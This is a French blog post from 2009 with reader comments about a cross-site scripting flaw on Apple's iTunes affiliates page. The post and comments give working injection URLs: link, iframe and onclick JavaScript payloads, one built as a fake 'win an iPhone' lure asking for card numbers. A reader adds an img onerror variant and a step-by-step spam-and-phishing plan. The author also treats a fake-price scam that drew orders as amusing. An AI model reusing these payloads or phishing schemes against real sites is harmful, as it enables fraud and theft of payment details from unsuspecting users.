Une faille de sécurité XSS découverte sur le site d'Apple

Par Sébastien Bilbeau, publié le 4 Novembre 2009

XSS Cross site scripting
Sur le site d'Apple, une faille XSS vient d'être découverte. C'est un peu l'attraction du moment, car n'importe qui peut l'exploiter afin d'y afficher les images de son choix. Apple n'a pas encore réagi, mais ce n'est sûrement qu'une question de temps avant qu'il comble ce trou de sécurité.

1. L'exploit

L'exploit se situe au niveau de certaines variables GET (thumbnailUrl, itmsUrl ...) qui autorisent l'inclusion d'adresses externes. Voici un exemple d'url à utiliser :

http://www.apple.com/itunes/affiliates/download/?artistName=HACK&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<a href="http://hack.com/">HACK</a>

Edit : la faille vient d'être corrigée par Apple...

http://www.apple.com/fr/itunes/affiliates/download/?artistName=HACK&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<a href="http://hack.com/">HACK</a>

Edit 2 : la faille est toujours active pour la partie française du site.

Quelques variantes mises au point pour l'occasion. La version iFrame Injection :

http://www.apple.com/fr/itunes/affiliates/download/?artistName=HACK&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<iframe width="800" height="500" src="http://hack.com"></iframe>

La version Javascript injection "Gagner un iPhone" + Phishing :

http://www.apple.com/fr/itunes/affiliates/download/?artistName=IPHONE&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=<a onclick="javascript:alert('Envoye votre numero de carte bleu et votre email a dtc@apple.com.ru')">CLIQUEZ-ICI pour gagner un iPhone</a>

2. Exemples d'injections

J'ai pris quelques captures d'exemples d'injections qui ont eu lieu sur le site. En voici quelques unes.

La pute de luxe

Quand Apple vend du Linux

L'iMac passe de 1500€ à 15€

La promo a d'ailleurs eu un franc succès. On a pu constater une pointe de 80 commandes validées en simultanée.

Comme quoi, le phishing peut rapporter gros.

Autres articles du même sujet

A propos

Créé en 2005, Tux-planet est un site qui a pour principale ambition de regrouper des articles simples sur Internet, Linux et le monde des logiciels libres. Lire la suite ...

Dernières réactions
(S'abonner ...)

pti-seb: @Alex Is : regarde là pour le Ctrl+Alt+Backspace.

Alex Is: Il me semble bien que Ctr+Alt+backspace ne marche malheureusement plus sous Ubuntu (sauf petite magouille)....

pti-seb: @Squeez : faura changer aussi les logos et la couleure. Sinon, j’ai vu une personne qui était motivée...

Squeez: Hum et à quand un cube pour Archlinux? Le projet est sous Creative Common SA donc je pense que cela ne...

pti-seb: @jluc @fanfantasy7 : je me suis juste contenter de traduire. Après, le SVG est disponible, donc on peut...

21 Commentaires pour "Une faille de sécurité XSS découverte sur le site d'Apple"

Flux des commentaires de cet article Ajouter un commentaire

Répondre

Jérôme M. , le 4 Novembre 2009 à 00:47
Ce n'est pas vraiment une faille !
On ne peut pas exécuter de JavaScript depuis l'URI car ils doivent vérifier la validité des données passées en variables GET avec des regexp par exemple.

De ce fait, on ne peut ni faire de redirections, ni voler de cookies, ni quoi que ce soit à part s'amuser à afficher sa photo depuis le site d'apple.
D'ailleurs en faisant ctrl+U, les données n'apparaissent même pas dans la source, elles sont écrites en javascript, je n'ai pas creusé davantage pour savoir comment...
Répondre

Lucas , le 4 Novembre 2009 à 00:51
@Lucas : Le principe du XSS c'est d'injecter des données arbitraires dans un site web. Là on injecte dans l'ordre du texte, une miniature, une image et une url. Pour moi ça reste une faille.

Une personne malvaillante peut très bien l'utiliser pour arnaquer des gens.

Exemple :

1- envoi d'un spam "Gagner un iPhone" à plein de gens avec l'url malvaillante
2- on peut injecter une url, donc on imagine que la page vue par les internautes sera une belle image "Gagnez un iPhone" + un lien vers un site externe
3- sur le site externe, on demande l'email et le code de la carte bleu (il y en aura forcément un qui tombera dans le panneau ...)
Répondre

pti-seb , le 4 Novembre 2009 à 00:59
@pti-seb : On pourrait s'amuser à faire ça mais ça serait limite faire du phishing, sauf qu'on garde l'url d'apple.
De toute façon cette "faille" vient d'être corrigé d'après ce que je vois .
Répondre

Lucas , le 4 Novembre 2009 à 01:14
@Lucas : snif, on aura pas fait mumuse très longtemps, dommage. Sinon, je viens de voir des exemples d'urls avec des alertes dedans. Donc c'était possible d'y mettre du javascript visiblement.
Répondre

pti-seb , le 4 Novembre 2009 à 01:18
@pti-seb : Ils sont rapides chez Apple :p
Répondre

Lucas , le 4 Novembre 2009 à 01:23
C'est reparti apparemment
Répondre

Jérôme M. , le 4 Novembre 2009 à 10:14
@Jérôme M. : yes, elle est toujorus active pour la partie fr du site en faite. Mise à jour de l'article.
Répondre

pti-seb , le 4 Novembre 2009 à 13:47
On dirait que c'est aussi corrigé pour la partie FR. Faut vérifier je suis en 3G et des fois ça marche pas super !
Répondre

Kegeruneku , le 4 Novembre 2009 à 14:09
Ah non ça marche toujours !!! c'est fun xD
Répondre

Kegeruneku , le 4 Novembre 2009 à 14:13
@Kegeruneku : yes ça marche toujours. J'ai fait quelques variantes du coup. Une version iFrame injection et une version Javascript Injection.

D'ailleurs je dédicace la version Javascript Injection + "Gagner un iPhone" à @Lucas, c'était juste pour lui montrer que mon idée est bien réalisable.
Répondre

pti-seb , le 4 Novembre 2009 à 14:32
Je pensais comme Lucas à la base car j'avais effectué mon test (une alert JS) sous Chrome qui bloque ce genre de truc avec le message suivant dans la console :

Refused to execute a JavaScript script. Source code of script found within request.

Plutôt bien pensé de la part de l'équipe de Chrome.
Répondre

Jeremy , le 4 Novembre 2009 à 14:45
Arf, moi qui pensais qu'ils avaient un bon parseur anti injection, je vois qu'on peut s'amuser à injecter pas mal de trucs même si le contenu des variables ne s'affiche pas tel quel dans la source html.

http://www.apple.com/fr/itunes/affiliates/download/?artistName=test&thumbnailUrl=http://hack.com/img.jpg&itmsUrl=http://hack.com/&albumName=%3Cimg%20src=%22ht%22%20onerror=%22alert%28%27ok%27%29%22%20/%3E
Répondre

Lucas , le 4 Novembre 2009 à 15:06
Vous sauriez m'expliquer l'utilité de la partie "&itmsUrl=http://tux-planet.fr" ? (Pour la version de la voiture là :p )
Répondre

Georgestheyeti OLOL , le 4 Novembre 2009 à 15:08
Ce que je trouve aberrant, c'est que des gens sont capables de valider un formulaire pour acheter un iMac à 15€ !

Faut pas s'étonner après que certains pleurent que l'on leur a piqué leur identifiants bancaires dans un email ou c'était marqué qu'ils allaient gagner 1000€ s'ils filent leurs identifiants ...
Répondre

Julien , le 4 Novembre 2009 à 16:35
Allez, un dernier pour la route .. http://j.mp/28KMmq
Répondre

Achille , le 4 Novembre 2009 à 16:45
@Jeremy : arf, pas con de la part de chrome effectivement.

@Julien : le problème c'est que beaucoup de gens chercher à valider la commande, pour ensuite fiare une réclamation. Ils pensent que Apple à fait une erreur et espère en tiré profit.
Répondre

pti-seb , le 4 Novembre 2009 à 16:52
J'oubliais le screenshot qui va bien http://omicronlab.net/upic/4af1a357-a56.png
(le lien "Linux" pointait vers http://www.zegeniestudios.net/ldc/)
Répondre

Achille , le 4 Novembre 2009 à 17:22
Damned, No-script m'empêche de voir vos âneries
Répondre

zo3 , le 4 Novembre 2009 à 19:15
avec une balise A qui réagi sur le hover...
Javascript exécutable via la survol par la souris d'un élément HTML comme une image ou autre...

http://tinyurl.com/yc738rq
Répondre

^fabrice^^ , le 4 Novembre 2009 à 21:08
@^fabrice^^ : pas mal ton exemple, par contre j'avait pas lu ton post, j'ai cliqué sur ton lien puis arrivé sur le site d'apple, j'ai mis 5 minute a me demandé pourquoi une boite de dialogue apparaissais très souvent^^
Répondre

vincentpsp2 , le 5 Novembre 2009 à 06:04